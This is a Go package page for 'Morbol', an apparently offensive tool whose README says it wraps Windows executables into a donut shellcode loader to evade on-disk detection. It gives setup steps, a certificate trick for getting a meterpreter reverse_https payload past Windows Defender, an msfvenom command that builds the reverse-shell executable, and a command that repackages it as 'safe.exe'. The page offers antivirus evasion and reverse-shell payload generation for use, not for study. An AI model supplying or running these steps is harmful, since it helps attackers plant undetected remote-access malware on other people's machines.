morbol

command module
v0.0.0-...-d76c313 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Feb 1, 2021 License: MIT Imports: 8 Imported by: 0

README

Morbol

Wraps PE Files (PIE required) into a shellcode loader via donut. This mainly evades detection on disk.

Setup

pip3 install donut-shellcode
sudo apt-get install upx

Usage

In my experience the only reliable way to evade defender with meterpreter is to use a reverse_https payload with a custom cert.

  • Modify /etc/ssl/openssl.cnf so that CipherString = DEFAULT
  • openssl req -new -x509 -nodes -out cert.crt -keyout priv.key
  • set HandlerSSLCert on the server side listener
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=... LPORT=...  HandlerSSLCert=... -f exe  > msf.exe
python3 morbol.py msf.exe safe.exe

Credit

Heavily based on:

Documentation

The Go Gopher

There is no documentation for this package.

Source Files

View all Source files

Directories

Path Synopsis

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.